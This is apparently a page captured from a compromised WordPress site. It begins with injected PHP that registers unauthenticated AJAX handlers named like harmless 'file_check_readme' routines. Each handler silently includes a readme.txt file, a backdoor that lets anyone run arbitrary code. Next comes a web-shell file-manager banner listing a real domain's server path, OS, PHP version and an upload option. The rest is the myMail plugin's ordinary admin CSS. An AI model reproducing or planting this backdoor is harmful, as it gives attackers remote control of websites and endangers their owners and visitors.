if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/myMail/assets/css/admin.css
#adminmenu div.wp-menu-image.dashicons-mymail:before {
	font: normal 16px/1 'mymail-icons' !important;
	content: '\e800';
}
#adminmenu #menu-posts-newsletter .wp-menu-image img {
	width:16px;
}

.branch-3-6 #adminmenu .dashicons-mymail:before,.branch-3-7 #adminmenu .dashicons-mymail:before{
	content: '';
}
.branch-3-6 #icon-edit.icon32-posts-newsletter,.branch-3-7 #icon-edit.icon32-posts-newsletter {
	background:url(../img/icons/newsletter.png) no-repeat left top;
}

#dashboard_right_now a.mymail-campaigns:before {
	font: normal 16px/1 'mymail-icons';
	content: '\e800';
	margin: 0 8px 0 2px;
}
#dashboard_right_now a.mymail-subscribers:before {
	font: normal 16px/1 'mymail-icons';
	content: '\e81c';
	margin: 0 8px 0 2px;
}
.branch-3-6 #adminmenu #menu-posts-newsletter.menu-icon-post div.wp-menu-image:before,body.branch-3-7 #adminmenu #menu-posts-newsletter.menu-icon-post div.wp-menu-image:before{
	content: '';
}


@media only screen and (-webkit-min-device-pixel-ratio:1.5),only screen and (min--moz-device-pixel-ratio:1.5),only screen and (-o-min-device-pixel-ratio:32),only screen and (min-device-pixel-ratio:1.5) {

	#icon-edit.icon32-posts-newsletter,#icon-edit.icon32-posts-subscriber,.newsletter_page_mymail_subscriber-manage #icon-edit.icon32-posts-post,.newsletter_page_mymail_templates #icon-edit.icon32-posts-post {
		-webkit-background-size:32px 32px;
		-moz-background-size:32px 32px;
		background-size:32px 32px;
	}
	.branch-3-6 #icon-edit.icon32-posts-newsletter,.branch-3-7 #icon-edit.icon32-posts-newsletter {
		background-image:url(../img/icons/newsletter_2x.png);
		-webkit-background-size:32px 32px;
		-moz-background-size:32px 32px;
		background-size:32px 32px;
	}

}